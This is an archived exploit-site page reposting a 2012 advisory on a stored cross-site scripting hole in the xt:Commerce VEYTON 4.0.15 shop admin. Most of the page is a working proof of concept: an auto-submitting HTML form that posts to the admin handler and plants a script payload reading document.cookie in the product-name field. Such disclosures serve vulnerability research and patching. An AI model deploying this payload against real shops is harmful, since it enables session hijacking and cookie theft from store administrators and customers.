what you don't know can hurt you

xt:Commerce VEYTON 4.0.15 Cross Site Scripting

xt:Commerce VEYTON 4.0.15 Cross Site Scripting
Posted Aug 23, 2012
Authored by LiquidWorm | Site zeroscience.mk

xt:Commerce VEYTON version 4.0.15 suffers from stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | e7e92bf66065166e79f65553844e0885

xt:Commerce VEYTON 4.0.15 Cross Site Scripting

Change Mirror Download
<!DOCTYPE html>
<!--

xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability


Vendor: xt:Commerce GmbH / xt:Commerce International Ltd.
Product web page: http://www.xt-commerce.com
Affected version: VEYTON 4.0.15 Professional/Merchant/Ultimate

Summary: One shop system, many shop solutions. The shop software
xt:Commerce 4 is the basic framework for online shops and for
merchants who install and configure their own shop.

Desc: xt:Commerce suffers from a stored XSS vulnerability when
parsing user input to the 'products_name_de' parameter via POST
method thru '/xtAdmin/adminHandler.php' script. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2012-5102
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5102.php


19.08.2012

-->


<html>
<head>
<title>xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability</title>
</head>
<body>
<form name="XSS" method="POST" action="http://localhost/xtAdmin/adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true">
<input type="hidden" name="date_available" value="2012-08-28 12:00:00" />
<input type="hidden" name="flag_has_specials" value="0" />
<input type="hidden" name="google_product_cat" value="New" />
<input type="hidden" name="group_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="manufacturers_id" value="0" />
<input type="hidden" name="meta_description_de" value="XSS" />
<input type="hidden" name="meta_keywords_de" value="ZSL-2012-5102" />
<input type="hidden" name="meta_title_de" value="Vulnerability" />
<input type="hidden" name="permission_id" value="1" />
<input type="hidden" name="price_flag_graduated_1" value="0" />
<input type="hidden" name="price_flag_graduated_2" value="0" />
<input type="hidden" name="price_flag_graduated_3" value="0" />
<input type="hidden" name="price_flag_graduated_all" value="0" />
<input type="hidden" name="product_list_template" value="" />
<input type="hidden" name="product_template" value="" />
<input type="hidden" name="products_average_quantity" value="0" />
<input type="hidden" name="products_cmc" value="" />
<input type="hidden" name="products_description_de" value="thricer" />
<input type="hidden" name="products_ean" value="1" />
<input type="hidden" name="products_id" value="10" />
<input type="hidden" name="products_image" value="Bild" />
<input type="hidden" name="products_keywords_de" value="Zero Science Lab" />
<input type="hidden" name="products_master_model" value="" />
<input type="hidden" name="products_model" value="T-3000" />
<input type="hidden" name="products_model_old" value="T-1000" />
<input type="hidden" name="products_name_de" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="products_option_list_temp..." value="" />
<input type="hidden" name="products_option_template" value="" />
<input type="hidden" name="products_owner" value="1" />
<input type="hidden" name="products_price" value="0" />
<input type="hidden" name="products_quantity" value="0.00" />
<input type="hidden" name="products_shippingtime" value="0" />
<input type="hidden" name="products_short_descriptio..." value="t00t" />
<input type="hidden" name="products_sort" value="0" />
<input type="hidden" name="products_startpage_sort" value="0" />
<input type="hidden" name="products_tax_class_id" value="0" />
<input type="hidden" name="products_url_de" value="www.zeroscience.mk" />
<input type="hidden" name="products_vpe" value="0" />
<input type="hidden" name="products_vpe_value" value="0.0000" />
<input type="hidden" name="products_weight" value="0.0000" />
<input type="hidden" name="shop_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="total_downloads" value="0" />
<input type="hidden" name="url_text_de" value="de/a2" />
</form>
<script type="text/javascript">
document.XSS.submit();
</script>
</body>
</html>
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    29 Files
  • 21
    Jan 21st
    12 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close